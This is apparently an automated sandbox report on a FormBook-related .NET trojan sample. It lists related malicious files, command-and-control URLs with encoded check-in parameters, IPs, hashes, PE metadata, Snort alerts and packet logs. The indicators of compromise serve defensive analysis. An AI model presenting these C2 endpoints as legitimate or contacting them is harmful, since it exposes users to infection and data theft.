13.59.53.244	PROFORMA FATURA PDF.exe	Get hash	malicious	Browse	www.lcpcap.com/owws/?6lM=tC19x4LEJPVs8ONi+s37iu7cXys1nv6MWGTi+k5+Xwww0X6jnHUjFOF1LJ5LiQA8pgEL&4hnLl4=tVkpfp903TM
	STATEMENT.exe	Get hash	malicious	Browse	www.linjudama.com/s5cm/?7nwhw=QDP0f9nkNg998lwZsNWJ9sidgDpm9neJ2Jn8Yw6wtNyTzbKtz13+oJch9rhNvjF++nAV&ML=EZBXFN7pQ8l
	PO 0003789311.exe	Get hash	malicious	Browse	www.irx1.com/hdno/?gL3T50=HFQPP850&Ir=8VXYlJ+qC9Zm/oWjwI4An6+SwQ6WUPemFoSpbmpwN9y10//JZ5Swhoao6e+gJuvLUJpT
	tgb4.exe	Get hash	malicious	Browse	www.downloadzilla.com/wdva/?h0DhCjC=lrtSiwQ0UV0iJ6qUawKzcS7ioNEK6Lev//Bpbi3MeUICWQT1VbW7lcDrVARDUN0Nz4+z&NXEL9=AbCxIhG8PxkDPDd0
	item.exe	Get hash	malicious	Browse	www.wayinfinite.com/m3rc/?Ntipth=llyx&s864=FekLAVUqIGMz2T4hePSh2wVAHI49txL7qiZrReFERor7hYZGq5xwg9yju7MLNYYUY1/6
	mal1.exe	Get hash	malicious	Browse	www.haifu168.com/kum/?GVM=/29xL9VS3/1U5/xPfegU/SuNpJoOLIhFGQE0mZ39nj/4nJDMDsD3ZSJRA6e20dMlRTAQ&oX=Txo8nZfpzf4tf
	PO_0065-2021.exe	Get hash	malicious	Browse	www.wayinfinite.com/m3rc/?JhJ=FekLAVUqIGMz2T4hePSh2wVAHI49txL7qiZrReFERor7hYZGq5xwg9yju4gxOZ0vbCercw0EmQ==&qR=J4i8zf50NBY44rGp
	MkV1zeHKw7.exe	Get hash	malicious	Browse	www.keguanchina.com/xkcp/
	n2fpCzXURP.exe	Get hash	malicious	Browse	www.painhut.com/p2io/?bl=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BX3zhA2M1C5a&Qxo=L6hP-X9hEvs0
	Purchase Inquiry&Product Specification.exe	Get hash	malicious	Browse	www.zut8.com/cu6s/?u6utf=vbhk+Gd5SI7yY0pWs+GOsHeqw10/7SXUKzBTc6E2X7f/RncSflutcU0Ht12xIKOqIhKG&9rN46F=xVMHGdB8
	pictures.exe	Get hash	malicious	Browse	www.futurenetx.com/8be3/?9rj0aZJ=EfmCLjhd39MMAKmRQG/HdYdrkTVM2IhR6h/3hOqgtPexGMVlCk1civ/2eSKsRkUfPy9S&b6=uVBXJryHZFi0GnH
	f268bad6_by_Libranalysis.exe	Get hash	malicious	Browse	www.volesvip.com/ugtw/?T6AH=bX/3LJmnBl2vQdkn0rMpdCAP7W11AfQ6M2gpr3oowtVX7S9qBtzDmLsBN4rg+TmDiFhP&wP9=mh2P2V3
	Specifikacije ponude proizvoda Mesutex 2021 doc.exe	Get hash	malicious	Browse	www.ryanscode.com/ftgq/?1bS=WXotCFzhm&pP-=23JWsXMNU3B901upE30epEJ3klQjQSAbj7e94TDSIuOB/RvSwvTb1tco95KeTC9gByt0NHr7dw==
	FY9Z5TR6rr.exe	Get hash	malicious	Browse	www.topsych.com/bucw/?l0GD1=xBZDi6rpmLdp-&4hlPBD=pHmd48aeJBSPZZ4oXPqMUa9iB+zw7o9633Qm6JoN2J/ksYljdm2ak3+3AB9oAE45NnYEmo/gHQ==
	New order list.exe	Get hash	malicious	Browse	www.rewsales.com/3nop/?Ft5pL0-=XTaJjzM4uCDOYtA+7yjD+eZH5K6XMAmSlRwTD4qGykZpCu9jO9GFDFvkz/CxvnMAuMtTc+GeGg==&Dffl=ZfopiXtpbJ6
	tgix.exe	Get hash	malicious	Browse	www.junkglobal.com/oerg/?AtxLpld=O3Nafde195flLn5s8vzxaW/utgaD58xH6xfGUR8Mza6C00S5vKcvEZVNFsrWPkksds0V&orW=W6L4IdAHz
	945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exe	Get hash	malicious	Browse	kenal.co/elber/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	Letter 09JUN 2021.xlsx	Get hash	malicious	Browse	52.14.32.15
	PO#78765439.ZIP.exe	Get hash	malicious	Browse	52.14.32.15
	New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	3.143.65.214
	PROFORMA FATURA PDF.exe	Get hash	malicious	Browse	13.59.53.244
	6dTTv9IdCw.exe	Get hash	malicious	Browse	3.143.65.214
	Telex_Payment.exe	Get hash	malicious	Browse	52.14.32.15
	STATEMENT.exe	Get hash	malicious	Browse	13.59.53.244
	QyKNw7NioL.exe	Get hash	malicious	Browse	3.143.65.214
	SKMBT41085NC9.exe	Get hash	malicious	Browse	52.14.32.15
	CC for account.exe	Get hash	malicious	Browse	13.59.53.244
	CARGO ARRIVAL NOTICE-MEDICOM AWB.exe	Get hash	malicious	Browse	52.14.32.15
	statement.exe	Get hash	malicious	Browse	52.14.32.15
	CONTRACT SWIFT.exe	Get hash	malicious	Browse	52.14.32.15
	RE; KOC RFQ for Flangers - RFQ 22965431.exe	Get hash	malicious	Browse	52.14.32.15
	PO 0003789311.exe	Get hash	malicious	Browse	13.59.53.244
	tgb4.exe	Get hash	malicious	Browse	13.59.53.244
	transferencia bancaria.exe	Get hash	malicious	Browse	52.15.160.167
	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	3.143.65.214
	item.exe	Get hash	malicious	Browse	13.59.53.244
	mal1.exe	Get hash	malicious	Browse	13.59.53.244

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	Letter 1019.xlsx	Get hash	malicious	Browse	18.140.1.169
	#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM	Get hash	malicious	Browse	143.204.98.37
	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Get hash	malicious	Browse	75.2.26.18
	U03c2doc.exe	Get hash	malicious	Browse	108.128.238.226
	Letter 09JUN 2021.xlsx	Get hash	malicious	Browse	18.140.1.169
	Docc.html	Get hash	malicious	Browse	13.224.99.74
	ManyToOneMailMerge Ver 18.2.dotm	Get hash	malicious	Browse	52.209.246.140
	Sleek_Free.exe	Get hash	malicious	Browse	143.204.209.58
	ManyToOneMailMerge Ver 18.2.dotm	Get hash	malicious	Browse	52.216.141.230
	#Ud83d#Udcde_#U25b6#Ufe0f.htm	Get hash	malicious	Browse	15.236.176.210
	WV Northern Community College.docx	Get hash	malicious	Browse	52.43.249.183
	wzdu53.exe	Get hash	malicious	Browse	13.249.13.113
	com.duolingo_1162_apps.evozi.com.apk	Get hash	malicious	Browse	52.222.174.5
	rnPij0Z886.dll	Get hash	malicious	Browse	13.224.91.73
	Plex-v8.7.1.20931_build_812981296-armeabi-v7a(Apkgod.net).apk	Get hash	malicious	Browse	99.81.164.127
	Nota Fiscal Eletronica 00111834.msi	Get hash	malicious	Browse	54.171.246.133
	#U00a0Import Custom Duty invoice & its clearance documents.exe	Get hash	malicious	Browse	75.2.26.18
	919780-920390.exe	Get hash	malicious	Browse	99.83.162.16
	lLJGwAgWDh.exe	Get hash	malicious	Browse	13.56.50.119
	KYC Compliance 10031.xlsx	Get hash	malicious	Browse	13.53.52.84

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	SecuriteInfo.com.Trojan.GenericKD.37066764.6014.exe	Get hash	malicious	Browse
	lueTCJ7lV4.exe	Get hash	malicious	Browse
	ZwqvqceZYv.exe	Get hash	malicious	Browse
	My First Game.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.MSIL_Kryptik.ANN.genEldorado.6306.exe	Get hash	malicious	Browse
	62c59ba0_by_Libranalysis.exe	Get hash	malicious	Browse
	Payment-slip011002883864.exe	Get hash	malicious	Browse
	Payment Copy#513.exe	Get hash	malicious	Browse
	Payment-slip000898070.exe	Get hash	malicious	Browse
	47755769_by_Libranalysis.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.46273706.27055.exe	Get hash	malicious	Browse
	RFQ# PC1746006.exe	Get hash	malicious	Browse
	po.exe	Get hash	malicious	Browse
	0kTpSR8QiF.exe	Get hash	malicious	Browse
	RFQ-EB200-PLOO1_Bidding.pdf.exe	Get hash	malicious	Browse
	po.exe	Get hash	malicious	Browse
	BID INSTRUCTIONSCOMMERCIAL.exe	Get hash	malicious	Browse
	RFQ-IOCL-PP-IN-301.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FGSF.21849.exe	Get hash	malicious	Browse
	TT-SWIFT.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.log Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1402
Entropy (8bit):	5.338819835253785
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr7K84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoesX3:MIHK5HKXE1qHbHK5AHKzvKviYHKhQnoe
MD5:	F2152F0304453BCFB93E6D4F93C3F0DC
SHA1:	DD69A4D7F9F9C8D97F1DF535BA3949E9325B5A2F
SHA-256:	5A4D59CD30A1AF620B87602BC23A3F1EFEF792884053DAE6A89D1AC9AAD4A411
SHA-512:	02402D9EAA2DF813F83A265C31D00048F84AD18AE23935B428062A9E09B173B13E93A3CACC6547277DA6F937BBC413B839620BA600144739DA37086E03DD8B4F
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co

C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42080
Entropy (8bit):	6.2125074198825105
Encrypted:	false
SSDEEP:	384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
MD5:	F2A47587431C466535F3C3D3427724BE
SHA1:	90DF719241CE04828F0DD4D31D683F84790515FF
SHA-256:	23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
SHA-512:	E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Trojan.GenericKD.37066764.6014.exe, Detection: malicious, Browse Filename: lueTCJ7lV4.exe, Detection: malicious, Browse Filename: ZwqvqceZYv.exe, Detection: malicious, Browse Filename: My First Game.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.MSIL_Kryptik.ANN.genEldorado.6306.exe, Detection: malicious, Browse Filename: 62c59ba0_by_Libranalysis.exe, Detection: malicious, Browse Filename: Payment-slip011002883864.exe, Detection: malicious, Browse Filename: Payment Copy#513.exe, Detection: malicious, Browse Filename: Payment-slip000898070.exe, Detection: malicious, Browse Filename: 47755769_by_Libranalysis.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.46273706.27055.exe, Detection: malicious, Browse Filename: RFQ# PC1746006.exe, Detection: malicious, Browse Filename: po.exe, Detection: malicious, Browse Filename: 0kTpSR8QiF.exe, Detection: malicious, Browse Filename: RFQ-EB200-PLOO1_Bidding.pdf.exe, Detection: malicious, Browse Filename: po.exe, Detection: malicious, Browse Filename: BID INSTRUCTIONSCOMMERCIAL.exe, Detection: malicious, Browse Filename: RFQ-IOCL-PP-IN-301.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Agent.FGSF.21849.exe, Detection: malicious, Browse Filename: TT-SWIFT.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................\|w......H........#...Q...................u.......................................0..K........-....i.......r...p.o....,....r...p.o....-.......o......o.....$........o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o....(+...o,.....&...(-...........3..@......R...s.....s....(....:.(/.....}P...J.{P....o0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.735718668413099
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
File size:	557568
MD5:	4e9095ceadd56bc68a99947ab929f691
SHA1:	bce676ea49fb6709dc0e9a23df2e918e05b4074b
SHA256:	1fe427cfa805bbabdc371ae3f6ccea4088ca76e8b9fce9828a74885d72339020
SHA512:	f0019d55c93ee2ca616ad53635592352ae313684291c5aa2bfba7130d13b964220d393a9867bc1e985b2b8f904cf8b8a210aeb571c140642f0eb0ee98cc67898
SSDEEP:	6144:mP2KJg5YoBA4cG+qw1y/lcCcfcgjXLSua0QxCiNLd7UXm7Ej2I++7dWS9WVKBlch:m1MA4cScHfc4euixCiZiXurSkV6y
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B...................x............... ........@.. ....................................`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4897de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x1FAF421A [Wed Nov 5 12:56:58 1986 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x89790	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0x596	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x877e4	0x87800	False	0.627983740775	data	6.74662046366	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0x596	0x600	False	0.410807291667	data	4.04237592323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x8a0a0	0x30c	data
RT_MANIFEST	0x8a3ac	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	Student.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Student
ProductVersion	1.0.0.0
FileDescription	Student
OriginalFilename	Student.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/10/21-16:59:51.470333	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49766	80	192.168.2.4	34.102.136.180
06/10/21-16:59:51.470333	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49766	80	192.168.2.4	34.102.136.180
06/10/21-16:59:51.470333	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49766	80	192.168.2.4	34.102.136.180
06/10/21-16:59:51.608156	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49766	34.102.136.180	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 16:59:51.425230980 CEST	49766	80	192.168.2.4	34.102.136.180
Jun 10, 2021 16:59:51.469867945 CEST	80	49766	34.102.136.180	192.168.2.4
Jun 10, 2021 16:59:51.470304966 CEST	49766	80	192.168.2.4	34.102.136.180
Jun 10, 2021 16:59:51.470333099 CEST	49766	80	192.168.2.4	34.102.136.180
Jun 10, 2021 16:59:51.512741089 CEST	80	49766	34.102.136.180	192.168.2.4
Jun 10, 2021 16:59:51.608155966 CEST	80	49766	34.102.136.180	192.168.2.4
Jun 10, 2021 16:59:51.608177900 CEST	80	49766	34.102.136.180	192.168.2.4
Jun 10, 2021 16:59:51.608377934 CEST	49766	80	192.168.2.4	34.102.136.180
Jun 10, 2021 16:59:51.608505964 CEST	49766	80	192.168.2.4	34.102.136.180
Jun 10, 2021 16:59:51.650806904 CEST	80	49766	34.102.136.180	192.168.2.4
Jun 10, 2021 16:59:56.778475046 CEST	49767	80	192.168.2.4	13.59.53.244
Jun 10, 2021 16:59:56.918297052 CEST	80	49767	13.59.53.244	192.168.2.4
Jun 10, 2021 16:59:56.918534994 CEST	49767	80	192.168.2.4	13.59.53.244
Jun 10, 2021 16:59:56.918880939 CEST	49767	80	192.168.2.4	13.59.53.244
Jun 10, 2021 16:59:57.058501959 CEST	80	49767	13.59.53.244	192.168.2.4
Jun 10, 2021 16:59:57.059190989 CEST	80	49767	13.59.53.244	192.168.2.4
Jun 10, 2021 16:59:57.059211016 CEST	80	49767	13.59.53.244	192.168.2.4
Jun 10, 2021 16:59:57.059371948 CEST	49767	80	192.168.2.4	13.59.53.244
Jun 10, 2021 16:59:57.059412956 CEST	49767	80	192.168.2.4	13.59.53.244
Jun 10, 2021 16:59:57.200577974 CEST	80	49767	13.59.53.244	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 16:57:50.246061087 CEST	49714	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:50.296977043 CEST	53	49714	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:50.435872078 CEST	58028	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:50.496335030 CEST	53	58028	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:51.348016977 CEST	53097	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:51.401459932 CEST	53	53097	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:52.649424076 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:52.702214956 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:54.005431890 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:54.056216002 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:55.173109055 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:55.226165056 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:56.384768963 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:56.437773943 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:57.327961922 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:57.389031887 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:57.558372974 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:57.608849049 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:57.857741117 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:57.907941103 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:57.918775082 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:57.979170084 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:58.644205093 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:58.694377899 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 10, 2021 16:57:59.861845016 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:57:59.915518999 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:01.020673037 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:01.073631048 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:02.144447088 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:02.203090906 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:03.317369938 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:03.369318008 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:04.455132961 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:04.505422115 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:05.708770037 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:05.758914948 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:06.869469881 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:06.921729088 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:07.960371971 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:08.013475895 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:09.109060049 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:09.161423922 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:10.901880980 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:10.955185890 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:19.356141090 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:19.433940887 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:34.979708910 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:35.137362003 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:35.970691919 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:36.040164948 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:36.212596893 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:36.415606976 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:37.417643070 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:37.478729963 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:38.271476030 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:38.335397959 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:39.262267113 CEST	56448	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:39.418808937 CEST	53	56448	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:40.566970110 CEST	59172	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:40.631238937 CEST	53	59172	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:41.373605013 CEST	62420	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:41.435574055 CEST	53	62420	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:42.854391098 CEST	60579	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:42.905726910 CEST	53	60579	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:44.009866953 CEST	50183	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:44.061709881 CEST	53	50183	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:44.516630888 CEST	61531	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:44.575516939 CEST	53	61531	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:45.540591002 CEST	49228	53	192.168.2.4	8.8.8.8
